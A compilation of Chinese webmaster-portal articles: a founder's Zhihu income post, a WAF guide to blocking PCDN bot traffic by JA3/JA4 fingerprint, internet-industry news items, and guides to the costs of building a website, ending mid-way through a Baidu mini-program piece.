整体的优化方案其实很简单,就是从站内入手,优化好站内,由于老站外部资源丰富,站内结构合理首页布局采用精简法,而且搭配了MIP和HTTPS改造,所以排名上升的比较快,新站优化原理也一样,做好站内这些优化后在慢慢增加外链更新内容,权重会慢慢的起来, 作者:Seven #### 年薪百万是什么样的体验 1989年出生,在帝都已经漂了近6年,一直从事互联网行业。目前自己创业做在线教育,近两年的公司收入大概年均在300w左右,除去员工工资,合伙人分红,办公成本等,留给自己的纯收入刚好破100w。 之前在北京某家大型互联网公司做产品经理(没错,就是知乎上最受诟病的百度),月薪2w。后来一来觉得这样很难实现财务自由,二来是感情上受了点挫折,就一咬牙一跺脚出来做了。 需要说明下,答主家庭普通四线城市,并没有原始的资金积累,能做成最大的原因就是创业伙伴选的靠谱,找到了两个心心念想要在这个城市立足,聪明且勤奋的伙伴。 无图无真相,先上图 2015年12月的账单,这是我创业一来收入最高的一个月份,当月53w进账。原因是当时做了一次非常成功的地推活动,吸收了一大批新用户,再加上推出了新的课程转化率很不错。 &lt;img src="https://pic2.zhimg.com/v2-69bad1029a219acfdce684edda3baae9_b.png" data-rawwidth="810" data-rawheight="1440" class="origin_image zh-lightbox-thumb" width="810" data-original="https://pic2.zhimg.com/v2-69bad1029a219acfdce684edda3baae9_r.jpg"&gt;   最近一个月的收入,19.5w,算是比较正常的一个月 &lt;img src="https://pic4.zhimg.com/v2-392b81c1fa6ec409f8d0ace8ce0a9243_b.png" data-rawwidth="810" data-rawheight="1440" class="origin_image zh-lightbox-thumb" width="810" data-original="https://pic4.zhimg.com/v2-392b81c1fa6ec409f8d0ace8ce0a9243_r.jpg"&gt;   刚刚拿到营业执照的时候,真的是内心充满了激动,仿佛时刻都准备好去纳斯达克敲锤子了。 &lt;img src="https://pic4.zhimg.com/v2-3bffc657faa405e03fe8266017be105f_b.png" data-rawwidth="514" data-rawheight="622" class="origin_image zh-lightbox-thumb" width="514" data-original="https://pic4.zhimg.com/v2-3bffc657faa405e03fe8266017be105f_r.jpg"&gt;   公司现在人不多,不算兼职,一共3个合伙人(分别负责课程建设,品牌推广和销售),6个授课导师,3个销售,2个技术同学还有1个微信公众号编辑妹子,一共12个人。 为了节约办公成本,办公室暂时选在了中关村附近商住两用的loft公寓,租金12000/月,以后业务上升团队扩充后,再带兄弟们搬到soho。 &lt;img src="https://pic3.zhimg.com/v2-4d75442ac856774cd5e9e88952787bc6_b.png" data-rawwidth="800" data-rawheight="600" class="origin_image zh-lightbox-thumb" width="800" data-original="https://pic3.zhimg.com/v2-4d75442ac856774cd5e9e88952787bc6_r.jpg"&gt; &lt;img src="https://pic4.zhimg.com/v2-4a0c364fceea2f018a24a9c239c60bd3_b.png" data-rawwidth="852" data-rawheight="640" class="origin_image zh-lightbox-thumb" width="852" data-original="https://pic4.zhimg.com/v2-4a0c364fceea2f018a24a9c239c60bd3_r.jpg"&gt;   1.工作状态 如果用一个字来诠释的话,就是-累。 这种累指的不是单纯工作量的增加,而是心理压力的指数级增加。 过去在大企业打工的时候,会有项目上线的紧张加班,但是也会适当的给自己减压,每隔一段时间发发呆划划水,跟着团队小伙伴去bd一下放松心情。 然而投身创业大军后,每天都是带着任务醒来,一天的生活从各种数字开始: 公众号新增粉丝数决定了是否有更多的潜在客户关注了我们; 学员的好评率近期我们内容是否迎合市场诉求; 公开课的收听人数代表着在同领域我们是否初具品牌效应; 月末的财务结算发工资和缴税更是一道难关。 就连出去放松的团建都成了一项工作,偷偷的在算怎么用较低的价格获得较高的团队体验。 PS:每次出去玩的时候,小伙伴都以为我是资深股民。 因为我每次都会眉头紧锁得盯着下面的“K线图” &lt;img src="https://pic1.zhimg.com/v2-fc2df7a0e0010f252045a46064146444_b.png" data-rawwidth="563" data-rawheight="918" class="origin_image zh-lightbox-thumb" width="563" data-original="https://pic1.zhimg.com/v2-fc2df7a0e0010f252045a46064146444_r.jpg"&gt;   2.生活状态 大概估算了一下,不算大宗商品购买(房,车),每年的固定消费大概在30w。 衣 作为一个工科直男,衣服是最让人省心的,因为选定了几个牌子就办个会员卡一直买。 目前常买的衣服有:selected的夏季款,Nautica的羊毛衫羽绒服,始祖鸟的秋冬装,levis的牛仔裤,基本上都形成习惯了,觉得要买新衣服了就去这几家。 大概每季度采购两次衣服,换算下大概每月在衣服上的消费2000左右。 对了。。对于鞋子的品味一直是长期受到周边人诟病的,最喜欢安踏(毕竟克莱汤普森代言),因为款式好看且舒服..不过受到了周期性吐槽。 &lt;img src="https://pic3.zhimg.com/v2-d4017c4394fbe7e743d347be2cffbd1a_b.png" data-rawwidth="557" data-rawheight="945" class="origin_image zh-lightbox-thumb" width="557" data-original="https://pic3.zhimg.com/v2-d4017c4394fbe7e743d347be2cffbd1a_r.jpg"&gt;   食 这一项是收入提升之后,最能显著感受到生活质量提升的一项。 学生时代去校门口的火锅店,盯着68元/份上等雪花肥牛看了半天,然后默默点了28元买两份赠一份的草原羔羊肉(orz)。 随着收入提高和支付方式的便捷(讲真现在刷信用卡和刷微信,比之前掏100元现金的心痛指数下降了N个等级),现在进大多数菜馆看菜单先看左边再看右边的程度了。 每月花费在胡吃海喝上的钱大概有10000。自己基本不做饭,除了跟各种合作伙伴聚餐,自己一个人的时候也会跑遍北京城搜罗各种小吃,吃算是目前最大的人生乐趣了。 ps:最喜欢北京的一家日式居酒屋,为避免广告嫌疑就不说是哪儿了。 &lt;img src="https://pic4.zhimg.com/v2-94278a776e4f7411dcf857727418adc7_b.png" data-rawwidth="1280" data-rawheight="762" class="origin_image zh-lightbox-thumb" width="1280" data-original="https://pic4.zhimg.com/v2-94278a776e4f7411dcf857727418adc7_r.jpg"&gt; &lt;img src="https://pic4.zhimg.com/v2-876745fbd6b7492c39ea4952141fd15f_b.png" data-rawwidth="1280" data-rawheight="720" class="origin_image zh-lightbox-thumb" width="1280" data-original="https://pic4.zhimg.com/v2-876745fbd6b7492c39ea4952141fd15f_r.jpg"&gt; &lt;img src="https://pic2.zhimg.com/v2-a96d0e997a1baf446af46fe1c233800d_b.png" data-rawwidth="708" data-rawheight="1280" class="origin_image zh-lightbox-thumb" width="708" data-original="https://pic2.zhimg.com/v2-a96d0e997a1baf446af46fe1c233800d_r.jpg"&gt;   住 由于不想把个人流动资金固定到北京高额的房地产上(即便我知道北京的房价会继续提高)。 于是一直没有买房,在办公室附近租了一个开间,大概35平米左右,每月租金5800 因为工作忙起来的时候恨不得住在公司了,所以家里略显杂乱 行 除了吃之外的最大乐趣,就是旅行   周五晚上带着帐篷,开车7小时去到青岛郊区的一个没什么游客的海边,在帐篷里待一夜,然后清晨看海边清晨6点的日出&抓螃蟹 &lt;img src="https://pic2.zhimg.com/v2-f9f2a287f3f7dd571b8766c5b424b981_b.png" data-rawwidth="1280" data-rawheight="1280" class="origin_image zh-lightbox-thumb" width="1280" data-original="https://pic2.zhimg.com/v2-f9f2a287f3f7dd571b8766c5b424b981_r.jpg"&gt;   旅行 平均每年给自己一周出国玩儿一次 每年5w 去年去的印尼,今年去的日本。 &lt;img src="https://pic2.zhimg.com/v2-adbb15b036d43b01d2a04d093c48bfd5_b.png" data-rawwidth="3024" data-rawheight="4032" class="origin_image zh-lightbox-thumb" width="3024" data-original="https://pic2.zhimg.com/v2-adbb15b036d43b01d2a04d093c48bfd5_r.jpg"&gt;   供养主人 每月供养最好的猫粮,清洗最圣洁的猫屎,并接受主人慈爱的眼神 &lt;img src="https://pic1.zhimg.com/v2-345233b72fd325b27947a732abb14cec_b.png" data-rawwidth="1280" data-rawheight="960" class="origin_image zh-lightbox-thumb" width="1280" data-original="https://pic1.zhimg.com/v2-345233b72fd325b27947a732abb14cec_r.jpg"&gt; 不是这个,温柔的眼神是给小情侣的 &lt;img src="https://pic4.zhimg.com/v2-20f7c14c632c78ce3dc68123aacaf32b_b.png" data-rawwidth="1280" data-rawheight="960" class="origin_image zh-lightbox-thumb" width="1280" data-original="https://pic4.zhimg.com/v2-20f7c14c632c78ce3dc68123aacaf32b_r.jpg"&gt; 这是眼神是给我的 家人 最骄傲的就是可以给含辛茹苦抚养我长大的父母回馈了。 自小生活在一个四线小城镇,父母都是工薪阶层,家境也不算宽裕,但是对于我的经济要求,只要是合理范围之内,都会满足。 还记得大学毕业的时候,iphone流行,我拿着一款nokia5700看着同学的iphone4羡慕不已。 然后老妈直接杀到市里的商场给我买了一款iphone4 要知道那时候,家里一直想买个10w左右的车,左思右想觉得贵最后买了一个大众polo。 现在儿子能赚钱了,第一想到的是让父母开心点。 今年过年的时候,给姐姐,妈妈,爸爸没人买了一款新款iphone,顺带把家里的电器换了一个遍。 虽然老爸还是觉得之前的大字体华为好用,不过看着吃年夜饭的时候,家人都抱着手机研究,还是特别的有成就感。   最后 虽然忙,但是自己把自己的时间表排的很充实,对于目前为止的人生,觉得很值得。 我记得我还在百度那会儿,见过一次从百度离职,一手创办了西安最大互联网公司的前辈,他有一段话让我记忆犹新。 “人生要实现财务自由,要逐步经历三个阶段” “第一个阶段叫做“超市自由”,当你去到超市的时候,喜欢什么商品可以直接拿,而不用太在意价位。” “第二个阶段叫做“购车自由”,当你去到一家4S店选车的时候,可以选择自己喜欢的款式,而不用仔细研究性价比” “第三个阶段叫做“公司自由”” “这个我懂,也就是说自身能力足够强,想去哪个公司就去哪个公司”为了表达自己的“慧根”,我忙不迭的说到。 “不,是想买哪个公司,就买哪个公司”前辈深深的叹了口气 “我现在还远远做不到,不过robin就可以” 作者:宏桑 链接:https://www.zhihu.com/question/52792601/answer/134456800 来源:知乎 #### 广东IP持续刷量攻击难根治?深度剖析PCDN流量劫持与JA3/JA4精准防护方案 近期,众多站长集中反馈网站遭遇来自广东地区IP的异常流量冲击,西部数码等虚拟主机服务商也受到影响。站长论坛上的讨论显示,这并非针对个别站点的攻击,而是一种已存在数年的PCDN刷下行流量行为。自去年起,这类流量的来源IP呈现出向广东地区高度集中的趋势。 主机帮自去年起已协助多家客户有效应对此类问题。本文将系统分析此类刷量行为的特点、传统防护手段失效的原因,并介绍一套精准拦截方案。 攻击特征分析:为何传统防护难以生效? 1. 地域集中但无法简单封锁 攻击IP主要分布在广东省内各城市。若直接封锁整个广东地区的访问,虽可阻断攻击,但会导致巨大业务损失——广东作为国内网民基数最大的省份,封锁后将丧失大量正常流量。同时,依赖地域识别的功能(如微信支付、QQ登录)也会对广东用户失效。 2. 海量IP池且多为家庭带宽 攻击者掌握的IP数量估计超百万,同时包含IPv4与IPv6地址,且多数属于家庭宽带动态IP,无法通过常规IP黑名单进行有效封禁。 3. 浏览器指纹多样且高度常见 虽然攻击流量的User-Agent有一定集中性,但总体上仍分散在Chrome浏览器的各个版本中,与正常网民的使用特征高度重叠,因此通过User-Agent过滤会产生大量误判。 4. 目标主要为静态资源 攻击流量集中请求图片、CSS、压缩包等网站静态资源,符合PCDN刷下行流量的行为模式。由于攻击者会轮询不同资源路径,仅封锁特定URL效果有限。 5. 低频访问规避频率限制 单个IP的访问频率极低,通常每日仅请求数次且间隔时间长,使得基于访问频率的防护规则(如CC防护)难以生效。 6. 持久化持续攻击 一旦网站被列入刷量清单,攻击便会长期持续。以主机帮博客为例,即便已启用防护并持续拦截,该流量仍近一年不间断发起请求,表现出极强的持久性。 精准解决方案:JA3/JA4指纹识别技术 在传统基于IP、频率、地域的防护手段纷纷失效的情况下,一种基于TLS握手指纹的识别技术可实现精准拦截且几乎零误杀——即JA3与JA4指纹识别。 技术原理 当用户通过HTTPS(SSL)访问网站时,每次TLS握手都会生成一个独特的JA3/JA4指纹。该指纹由客户端TLS栈的版本、支持的密码套件、扩展列表等参数哈希生成,如同一台设备的“网络指纹”,具有极强的唯一性和稳定性。同一批自动化工具或脚本产生的流量,即便更换IP或模拟不同浏览器,其TLS指纹仍保持一致。 防护配置实操(以百度云防护为例) 接入防护:将网站接入百度云防护(专业版及以上支持JA3/JA4识别)。 添加规则:进入“Web防护” → “自定义规则” → “添加规则”。 选择条件:在匹配条件中选择“JA3”或“JA4”指纹。 填入指纹: 针对此次广东刷量流量,JA3指纹值为:8ab05683f2e4dd948638ab312a972f44 JA4指纹值为:t00d8007h2_ee0b5a6c69b8_0a9c83bf8b96 设置动作:处置动作选择“拦截”,保存规则。 规则生效后(约1分钟),攻击流量将被精准阻断。管理员可通过防护日志查看拦截情况,确认防护效果。 总结 面对日益隐蔽和分布式的PCDN刷量攻击,依赖传统防护维度已力不从心。JA3/JA4指纹识别技术通过客户端TLS层特征进行识别,实现了对自动化流量的精准打击,为站长提供了一种高效且基本无误杀的防护选择。建议受此类问题困扰的网站管理员尽快评估并部署基于指纹识别的防护方案。 如有需要百度云防护的,可以了解下: 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 #### 广东为「疫情防控类」网站开通备案优先审核绿色通道 2 月 5 日消息:据工信部网站消息,为做好疫情防控工作,便于相关政府部门疫情期间紧急开通疫情防控类网站、APP 等互联网信息服务,广东省通信管理局于 2020 年 1 月 31 日为此类 ICP 备案申请开通优先审核绿色通道。 广东省通信管理局告知省内三家基础电信运营企业、省政务数据服务管理局、数字广东公司和腾讯云、阿里云等互联网接入服务企业,优先审核有疫情防控和公共服务类网站或 APP 需要紧急上线的需求。 据介绍,2 月 2 日,腾讯公司就应相关地方政府及卫生健康部门的需求,为将其支持广州市政府推出的「穗康」微信小程序推广到其它地市提供疫情收集等政务公众服务,需紧急上线在「穗康」基础上推出的「腾讯政务云」平台(域名:tgovcloud.com),特申请优先审核该平台 ICP 备案。广东省通信管理局立即响应,半小时内给予审核通过并核发备案编号「粤 B2-20090059-513」。 对站长来说,也许可以通过这次疫情收割一波流量哦…… #### 广东云浮男子搭设网站贩卖VR淫秽视频牟利获刑三年 3 月 30 日消息,据“扫黄打非”微信号发布的消息称, 2018 年 10 月,广东省云浮市中级人民法院作出终审裁定,以贩卖淫秽物品牟利罪,判处被告人冯某某有期徒刑三年,并处罚金 5000 元。同时,追缴其全部违法所得,并依法没收扣押在案的电脑、手机等作案工具。 经查,冯某某自 2015 年 9 月开始搭建运营“值得看”网站。该网站起初主要用于发布电影、电视剧资讯,但冯某某觉得只发这些信息没什么钱可赚。为牟取更多利益,冯某某自 2017 年 7 月开始在其搭建“值得看”网站内设立“VR资源”栏目,发布大量淫秽视频网盘下载链接,并将这些下载链接的权限设置为只有注册会员才能点击下载。 随后,冯某某批量注册会员账号和登录密码,并在某网购平台上开设“值得看”店铺,以 10 元单价向他人出售“值得看”网站的注册会员账号和登录密码等虚拟商品,供购买者以会员身份登录“值得看”网站下载淫秽视频。 2017 年 8 月,尝到“甜头”的冯某某开始在“值得看”网站内发布相关提示及其个人微信二维码,引诱网民通过扫二维码添加其个人微信号,以下载淫秽视频。当购买者通过微信支付 19 元的费用后,冯某某即向购买者发送淫秽视频资源包链接,供购买者下载淫秽视频。 截至案发,冯某某通过上述方式共赚取非法收益8158. 9 元,警方在其发布的链接内查获淫秽视频 108 个。 #### 广东男子搭设淫秽网站获刑七年 技术帮凶皆获罪 5 月 6 日消息,据“扫黄打非”微信号发布的消息, 2019 年 4 月 2 日,广东省高级人民法院作出终审裁定,维持深圳市中级人民法院一审判决,以传播淫秽物品牟利罪,判处巫某某有期徒刑七年,并处罚金人民币十万元;判处吴某某有期徒刑三年六个月,并处罚金人民币三万元;判处胥某某有期徒刑三年六个月,并处罚金人民币三万元。同时,对扣押在案的手机、手提电脑、电脑主机、移动硬盘等涉案物品予以没收。 经查, 2016 年 12 月,巫某某在网上联系到网络技术公司的吴某某为其设立的淫秽色情网站“XX看片网”进行优化,要求吴某某按照原来的网站内容,把网站的后门去掉,重新做一个网站。吴某某遂让其员工胥某某等人负责该“项目”。吴某某、胥某某明知维护的网站是淫秽色情网站,仍为巫某某提供技术服务并获取非法利益。 2017 年 3 月,胥某某离开吴某某所在公司,以个人身份继续帮巫某某维护淫秽色情网站并收取维护费用。 2017 年 6 月 13 日,侦查机关对巫某某位于深圳市龙岗区某小区内的作案地进行搜查,现场查获作案用的电脑、银行卡 18 张、他人的居民身份证 8 张等物品。 截至案发,公安机关在该网站内共查获淫秽色情视频 2500 余部,吴某某通过其搭设并经营的淫秽色情网站“XX看片网”收取会员、广告、点击流量等费用共计 228 万余元,吴某某、胥某某分别从中获得非法收益 4 万余元。 #### 广州某科技公司遭境外黑客网络攻击 2025年5月20日,广州市公安局天河区分局就一起重大网络攻击事件发布警情通报。经查证,某科技公司自助设备后台系统于近日遭受境外黑客组织网络攻击,攻击者通过技术手段突破企业安全防护体系,导致核心业务系统服务中断逾五小时,用户隐私数据存在泄露风险。技术特征分析显示,攻击者采用多阶段渗透策略:首先利用开源工具对企业网络进行资产测绘,定位防护薄弱环节;继而绕过边界防御系统实施非法入侵,通过横向移动控制多台关键设备;最终在系统内植入多种恶意程序,致使官网及业务系统全面瘫痪。经技术溯源,攻击行为呈现明显的组织化特征,涉及专业化的目标侦察、漏洞利用及痕迹清除操作。事件响应时间线:事发后企业立即启动应急预案,组织技术团队进行系统恢复属地公安机关接警后成立专案组,完成电子证据固定与样本提取国家专业技术团队介入,开展攻击溯源与数字取证工作据专案组披露,此次攻击暴露出三大特征:■ 长期潜伏:攻击组织持续对我国关键基础设施进行网络侦察■ 定向突破:采用APT(高级持续性威胁)攻击模式针对科技企业■ 破坏意图:兼具数据窃取与系统破坏双重攻击目的值得注意的是,尽管攻击规模达到网络战级别,但技术分析显示攻击者存在明显操作疏漏,遗留大量可追踪线索。目前公安机关已掌握包括攻击路径、恶意代码特征、C2服务器信息在内的关键数字证据,案件侦破工作正在推进中。天河网警负责人强调,此类跨境网络攻击已涉嫌触犯《网络安全法》《数据安全法》等多项法律法规,公安机关将联合国际执法机构深挖幕后黑手。同时提醒重点行业单位加强以下防护措施:√ 定期开展网络安全攻防演练√ 建立全天候安全监测机制√ 完善重要数据加密存储方案√ 制定多层级应急响应预案本次事件暴露出新型网络空间安全威胁的复杂性,网络安全专家呼吁构建"政企联防"的安全生态体系,共同应对日益严峻的跨境网络攻击挑战。 #### 广电总局:直播、短视频网站主动自查自纠 清理问题节目 今天,国家广播电视总局公开发文称,一批社会直播和短视频网站主动响应管理要求开展自查自纠,其中包括微博、秒拍、好看视频、好兔视频、快视频、虎牙、斗鱼等短视频和直播网站以及腾讯视频、优酷、爱奇艺等综合性视频网站都加入其中。 据介绍,上述平台组建专项清查团队,集中对涉黄、格调低俗、宣扬暴力、恶搞经典、歪曲历史、非法剪辑拼接等问题节目进行清理,共计自査清理下线问题音视频节目 150 余万条,封禁违规账户 4 万余个,关闭直播间 4512 个,封禁主播 2083 个,拦截问题信息 1350 多万条。在主动清理问题节目的同时,各家网站均重视和加强了审核管理长效机制建设。 以下为公告全文: 今年以来,针对当前网络视频行业存在的突出问题,国家广播电视总局会同属地管理部门以约谈、整改、下架、永久关闭问题产品等“组合重拳”开道,依法严肃问责了“今日头条”“快手”等问题性质严重的视频网站,督其全面深入整改,深刻反思企业应尽的社会责任,对全行业形成警示和教育,带动了一批社会直播和短视频网站自查自纠,进一步深度清理了网络空间的精神毒品、垃圾和糟粕,促使相关互联网企业进一步提升了责任意识、强化了管理措施。 近一个月来,微博、秒拍、好看视频、好兔视频、快视频、虎牙、斗鱼等短视频和直播网站以及腾讯视频、优酷、爱奇艺等综合性视频网站,纷纷响应管理要求,组建专项清查团队,集中对涉黄、格调低俗、宣扬暴力、恶搞经典、歪曲历史、非法剪辑拼接等问题节目进行清理,共计自査清理下线问题音视频节目 150 余万条,封禁违规账户 4 万余个,关闭直播间 4512 个,封禁主播 2083 个,拦截问题信息 1350 多万条。在主动清理问题节目的同时,各家网站均重视和加强了审核管理长效机制建设。有的网站新增完善了涉及恶搞经典、儿童邪典和相关有害敏感信息关键词库 8800 余条,建立了有害视频样本库,提高了问题节目的排查能力,遏制了问题节目的再次传播。有的定期发布不良信息自查通告,公布下架节目名单和处罚账号,公开不良内容举报电话,鼓励社会监督。有的升级账号管理措施,将黑名单与身份证、手机号信息挂钩,并应用人脸识别技术进行用户认证。有的建立红色经典节目库对节目源进行保护。有的新建正能量内容池,进行首屏优先推荐。有的制定增加了公序良俗审核标准和未成年人保护防控手段。 #### 广西上网更快了? F 根镜像节点和国家域名顶级节点正式上线提供服务 11 月 7 日消息,从中国互联网络信息中心官方获悉,由中国互联网络信息中心联合广西壮族自治区工业和信息化厅、中国移动广西公司共同建设的“广西 F 根镜像节点和国家域名顶级节点”(双节点)近日正式在南宁上线提供服务。 据了解到,中国互联网络信息中心表示,本次在南宁上线的双节点,能够有效降低网络流量跨区流通的时间和成本,大幅降低域名解析时延,实现网络和数据协同调度,提升互联网访问速度和安全性。 据介绍,本次上线的双节点同时将有力推动工业互联网资源向广西集聚,促进 5G、大数据、人工智能与制造业融合发展。 工信部数据显示,截至 9 月末,三家基础电信企业的固定互联网宽带接入用户总数达 5.78 亿户,比上年末净增 4257 万户;三家基础电信企业的移动电话用户总数达 16.82 亿户,比上年末净增 3895 万户。 #### 建一个海外网站一年大概需要多少钱? 近几年站长在国内混不下去了,都去做英文站了,那么做一个海外站一年需要多少钱呢? 今天主机吧就来给大家梳理下做一个海外网站具体需要的成本: 1.域名 COM域名注册在cloudflare大概在90元/年左右,记住做海外站千万别在国内注册域名,国内不只需要实名,同时域名服务商配置的DNS都是国内的,国外解析慢。 2.虚拟主机云服务器 如果做简单的网站内容网站用虚拟主机,首选美国虚拟主机,可以看下bluehost服务商的,一年大概300多块,如果云服务器一年一千多,海外站一定不要用国内的服务器,因为国外访问非常慢。 3.网站源码 国外有非常成熟的免费开源系统,几乎所有类型的网站都可以利开源系统做出来,当然需要你有一定的技术,比如wordpress系统就是非常流行的网站系统,所以网站源码免费。 4.安全CDN 既然要做海外站,CDN是必不可少的,不仅可以避免网站被攻击,同时还可以全球加速,目前cloudflare提供免费套餐,而且是全球加速,非常不错。 5.SSL数字证书 国外网站部署SSL证书是必须的,因为搜索引擎非常看重SSL证书,没有部署SSL证书的网站很难被搜索引擎收录,SSL证书一年大概200多块,也有免费的Let's Encrypt,不过免费的需要三个月更新一次。 6.科学上网 海外网站推广主要是在谷歌,所以需要用到科学上网,一般一年200多块。 综合上述,做一个海外网站一年大概需要500元最低的,据主机吧的了解,已经有站长在大把赚美元了。 #### 建一个网站需要什么? 这篇文章简单的介绍建一个网站需要用到的一些相关知识,主机吧觉得写得不错,需要网站建设的朋友可以参考下 第一:清晰的网站目标定位   对于网站的目标定位,大家说法不一,但是总体上要让大家有一个明确的做站目标 第二:注册域名 通过各方面的准备论证,找准了做网站的方向,现在需要开始做网站的第二步,注册域名,注册域名需要注意以下几点: 简单易记忆 突出网站的类别 域名类别的选择 一个好记忆的域名可以让你的用户轻易就记住了你的网站,方便下次再次访问,网站的域名应该尽可能的突出网站的类型是什么,一些大型综合性的网站往往以数字,拼音来做品牌营销,而中小型的网站,则要让用户能够通过域名就判断出网站是做什么的,网站的后缀的选择应该根据自己的行业去选择。 第三:服务器的选择 服务器关乎以后网站的发展,这点是亲身体会,好的服务器让你无忧无虑,大可去做网站运营推广,而一个安全等等各方面做的不太好的空间,让你非常郁闷,几度奔溃,想起那些半夜起来要给服务器商打电话而无人应答的时候很是郁闷。所以这里建议大家选择一些有实力的公司,空间相对稳定的idc商,这样你可以省去很多的麻烦! 第四:网站制作 网站源码:要求安全、符合用户体验,基本满足你的要求即可,不需要那些花里胡哨的功能,有些用户一味追求功能,导致程序臃肿,影响运行速度与安全,事实90%的功能用户是用不着的。 第五:网站安装:配置服务器环境,大家可以搜索的学习学习,这里需要注意下,需要对网站的目录权限进行严格的控制,具体的安装过程,可以参照各个源码的说明去进行! 第六:网站结构的设计:这点比较重要,一个网站做出来,一定要有合理的结构布局,一方面提高用户体验,一方面方便搜索引擎蜘蛛爬行,很多源码虽然在这方面做了很多工作,但是还是要我们自己去重新设计处理,同质化的模板太多,很不利于网站优化,所以不管是导航还是其他什么方向都要重新修改,这点大家可以参考下百度SEO建议,参考修改。这里我们所要追求的就是代码精简代码,提高网页加载速度,尽可能的采用div+css结构,js类尽可能的放到网页底部,关于这类的文章是比较多的。 #### 建站需要准备什么,需要找建站公司吗? 建站需要准备的主要事项包括以下几个方面: 1. 确定网站目标和需求 在开始建站之前,需要明确你的网站的目标是什么,是为了宣传企业、销售产品、提供服务,还是为了其他的目的。同时,你也需要明确你的网站需要哪些功能,例如博客、论坛、商城、会员系统等。 2. 购买域名和空间 域名是网站的地址,空间则是存储网站文件的服务器。你需要购买一个合适的域名和一个足够大的空间来存放你的网站文件。 3. 设计和开发网站 这一步通常需要专业的技能和工具。你需要设计网站的外观,编写网站的代码,并确保网站可以在各种设备和浏览器上正常运行。 4. 测试和优化网站 在网站上线之前,需要对其进行全面的测试,以确保其在各种情况下都能正常工作。同时,也需要根据用户反馈和使用情况进行优化,以提高用户体验。 5. 维护和更新网站 网站上线后,你需要定期进行维护和更新,以保证其稳定和安全。这可能包括更新内容、修复错误、升级系统等。 至于是否需要找建站公司,这取决于你的需求和能力。如果你的需求很复杂,或者你没有足够的技能和时间来自己建站,那么找一家专业的建站公司可能会是一个很好的选择。他们可以提供一站式的服务,包括设计、开发、测试、优化和维护等。然而,如果你有一些编程基础,并且有时间来学习新的技能,那么自己建站也是一个可行的选项。这样可以节省成本,而且你可以更好地控制你的网站。 总的来说,建站需要准备的事情并不复杂,但是需要投入一定的时间和精力。如果你不确定如何开始,那么找一家建站公司可能会是一个好的选择。 #### 建网站,买域名和虚拟空间总共要多少钱? 记得02年上大学那会,我们开了一门课是网页设计与制作。那时觉得会做网站是件挺神的事,没想到从毕业到现在,一晃10多年过去了,竟然在建站行业做了10年。回忆起来,感觉都是件不可思议的事情。可能真如有些人说的,把兴趣爱好当成职业,是个不感觉累的事情。 废话不多说了。从事建站行业这么多年,几乎每天都会有朋友咨询建网站需要多少钱?或者域名服务器多少钱?等等类似问题,下面给大家分享下,网站的组成部分以及价格吧。 一、域名: 啥是域名,域名就是我们经常看到的网址。www.****.com 这种,这个网址是需要注册的,也是按年注册的,当然除了.com,还有.cn、.cc、.top、.net等为后缀的域名。区别也不大,但常用的还是.com为后缀的比较多。 费用呢?域名注册商收取的费用都不一样。目前来说一般都在55-130元不等。这个是域名费用。任何网站都需要用网址,所以必须要花这个钱的。 二、服务器 服务器和U盘的作用差不多。都是用来存储文件的。只是服务器存储的是你做好的网站文件,包括图片,文字,视频,数据库,网站程序等等。 服务器也是按年收费的,并且任何网站都需要用到服务器,这个费用是没办法省掉的。 多少钱呢?每个服务器商的收费都不一样,这个根据服务器的配置(类似你电脑的配置,CPU,内存,主板啥的),服务器的带宽(类似你家里上网的10M,100M这些),服务器的容量(类似你U盘的1G,2G)等等不同,收费在100-几万都不等。当然几万的一般都是大网站,小型网站要不了多少钱。100多-500元左右应该够了。 经常有很多用户问,网站的价格是永久的吗?或者是一次性的吗?其实任何网站都必须要以上两个部分,所以就没有永久一说,如果您的网站要长期使用,那么以上两个部分,您是需要每年都要缴纳费用的。 三、网站设计制作 什么是网站设计:就是你网站打开以后的界面,这个需要设计师美工去设计; 什么是程序开发:就是你网站做好了,你要上传图片到你的网站上,肯定需要程序员帮你做程序和数据库,要不然单纯的网页,你是没办法去管理你的网站的,也无法更新你的网站图片,修改文字; 其实任何网站价格的差异,最重要的也就是网站设计制作。这个也是所有网站价格不同最重要的一个步骤。 1>网站设计师程序员的工资。一般来说,有经验的设计师和程序员,工资不会低,那么制作网站的费用肯定不是最便宜的; 2>地区物价水平。每个城市的物价不同,办公成本也不同,所以价格肯定也会有差异; 3>本身的设计要求或者网站功能要求。一般版面设计要求高或者功能复杂的网站肯定要比普通展示型网站的价格要高。这个本身的工作量就决定了。 四、网站售后。 售后服务在整个网站制作过程中其实体现不到,但在你网站真正运营过程中,就会起到至关重要的左右。因为网站一旦运营,就会有可能出现各种各样的问题。 1>网站系统的升级,特别是随着浏览器本身升级,你的系统不升级可能会出现不兼容; 2>被人攻击了,怎么办?网站是否有定期备份,基本攻击了也能恢复; 3>网站一些常见的修改和调整,例如电话号码修改、LOGO调整、宣传图片的文字替换等等; 4>网站有一些新的产品图片或者新的内容添加,自己不懂得操作后台,怎么办?(如果是经常更新或者电商类网站除外,肯定要招个小编的)。 5>网站提交百度、360、搜狗的收录,以及关键词的相关设置,自己不会怎么办? 6>网站备案、网站功能升级、添加在线客服、添加流量统计、网站域名服务器到期提醒、网站若需要公安部备案怎么操作、网站后台培训、网站后台密码忘记了怎么办?若有邮箱,怎么设置?若有公众号,怎么使用?怎么申请?以及网站源代码是否提供?。。。。 等等都是售后的相关问题。 以上就是从业这么多年的一些总结,如果能给大家提供到一些帮助,麻烦给点赞支持下。谢谢! #### 开发百度小程序经验分享 非常开心能跟大家分享我们在开发百度小程序中遇到的问题,分别是两个部分,第一部分是站长会遇到的一些运营问题,第二部分是程序猿开发中可能会遇到的一些bug。希望能够帮助到大家成功开发自己的小程序! 站长运营中碰到的一些问题 下面给大家分享一下站长运营部分遇到的问题(文末会分享程序猿哥哥的遇到的问题) 1.名称审核问题 刚开始貌似是机器审核,导致出现了大量垃圾小程序。当然,现在了,现在这个问题已经解决了,不过 名称审核可就比较严格了。比如:别人前期审核过的可以叫装修网、家居网,但是你叫装修家居网就不能审核过。但是前期审核通过的一些名称存在问题的小程序,最近好像也在强制下线整改了。我们在起名字的时候,头都快想秃了,品牌名没有商标,注册商标要一年多,最后实在无可奈何,选择了使用公司名称中的两个字才审核过,所以其他碰到名称审核问题的朋友,可以试试用你家公司名称加行业词。 2. 配置request的合法域名问题 